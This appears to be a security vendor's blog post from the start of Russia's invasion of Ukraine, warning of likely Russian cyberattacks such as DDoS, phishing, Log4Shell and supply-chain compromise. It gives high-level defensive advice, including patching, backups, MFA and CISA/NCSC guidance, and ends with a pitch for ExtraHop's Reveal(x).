The predicted invasion of Ukraine by Russian forces has begun, and with it, the risk of cyber warfare against Ukraine's supporters has escalated. In the run-up to the invasion, Russia deployed offensive cyber operations against Ukrainian Government websites and infrastructure. With the invasion now fully underway, an escalation of cyberattacks is expected to include critical Western infrastructure, banks, hospitals, and other high-value targets.
In addition to Russian state-sponsored operations against their opponents, we expect cybercriminal enterprises in Russia to be given the green light to escalate their operations against Western countries with a suggestion that the Russian state will turn a blind eye to their activities.
The Nature of Russian State-Sponsored Attacks
Most planned attacks arrive with volumetric and nuisance threats—as in the "shock and awe" tactic we're seeing via the onslaught of DDoS attacks. However, these threats often provide air cover while attackers lay the groundwork for the main event. Organizations should assume that once a fast-and-furious attack dies down, a far more destructive attack is in the works.
While it is difficult to predict how any attack will be carried out, past attacks lead us to expect that some known trends will persist:
- Phishing is a likely initial attack nexus. Over 36% of all attacks begin with compromise resulting from a successful phish.
- Log4Shell is a likely vector for exploit. Russian APT Primitive Bear/Gamaredon has been targeting Ukraine, and they are known to be actively exploiting Log4Shell vulnerabilities.
- Supply-chain based attacks should be expected. These include both attacks that use vulnerabilities (such as Log4j) in open-source libraries baked into software and attacks hidden in the updates of software that is providing critical business services—such as IT management software providers like Kaseya.
Because of the risk of phishing, vulnerability exploits, and supply chain attacks, defenders should stay on guard and focus on the midgame, where the attacker pivots through your infrastructure, taking actions that can alert your team to the intrusion, including command-and-control communications, data staging, and lateral movement.
Steps for Proactive Resilience
To help organizations build resilience against incoming cyberattacks, Cybersecurity and Infrastructure Security Agency (CISA) published Shields Up guidance for all US-based organizations, and the National Cyber Security Centre (NCSC) published a list of actions for heightened threat for UK-based organizations. All organizations should read either the Shields Up guide or NCSC actions for specific proactive measures to prepare for an escalation of risk that is likely for the duration of the Russian military action.
To prevent initial intrusions, the defense focus of all organizations should be on treating incoming electronic communications with skepticism, including using attachment scanning. In addition, backups should be up to date, operational, and restores should be tested. To reduce your attack surface, ensure that your critical systems are all on the latest patch levels, and commonly exploited vulnerabilities including Log4Shell are remediated. Finally, double check that your supply chain and outsourced operations have all taken steps to protect you as well. If possible, institute a more robust third party vendor management assessment criteria for any critical SaaS applications.
We also recommend specific common-sense steps organizations should be considering and communicating to their staff:
- Ask employees to not click on links they don't absolutely have to click on.
- Ask all employees to avoid going to any sites they don't have to for business purposes.
- Consider bringing people back into the office to reduce surface attack area from de-perimeterization.
Even with the best user-education, phishing attempts are still likely to succeed. To further protect your data:
- Universally implement multi-factor authentication (MFA).
- Use a robust identity and access management/governance (IAM/IAG) tool with MFA, to manage access.
Finally, to reduce supply chain compromise on employee-owned devices:
- If your organization allows personally owned devices to connect to the network or any corporate cloud assets, remove any non-business-essential apps from those devices, especially social media and gaming.
Finally, because Russian APTs are known for using tactics that evade perimeter defenses, organizations should stay vigilant and use a layered security approach, including endpoint detection, network monitoring, and secure decryption to look for signs of initial and post-compromise activity.
If you're an ExtraHop customer, a Threat Briefing is available in Reveal(x). Watch this short video for an overview of what to look out for, and how Reveal(x) detections can support CISAs Shields Up Guidance and detect signs of compromise.